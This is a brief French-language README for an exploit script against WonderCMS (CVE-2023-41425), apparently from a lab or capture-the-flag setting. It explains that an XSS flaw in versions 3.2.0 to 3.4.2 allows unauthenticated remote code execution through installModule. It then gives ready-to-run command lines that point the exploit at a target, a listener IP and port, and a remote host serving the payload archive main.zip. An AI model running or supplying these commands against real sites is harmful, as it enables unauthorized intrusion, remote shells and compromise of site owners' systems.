
WonderCMS RCE CVE-2023-41425
Les versions v3.2.0 à v3.4.2 de WonderCMS avec la vulnérabilité XSS permettent à un acteur malveillant d'atteindre une RCE en téléchargeant un composant vers installModule CVE-2023-41425 (Pas besoin de connaître le mot de passe).
Spécifier l'hôte distant à partir duquel le fichier main.zip est téléchargé
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
OU sans spécifier le fichier main.zip. Par défaut, il le télécharge depuis main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
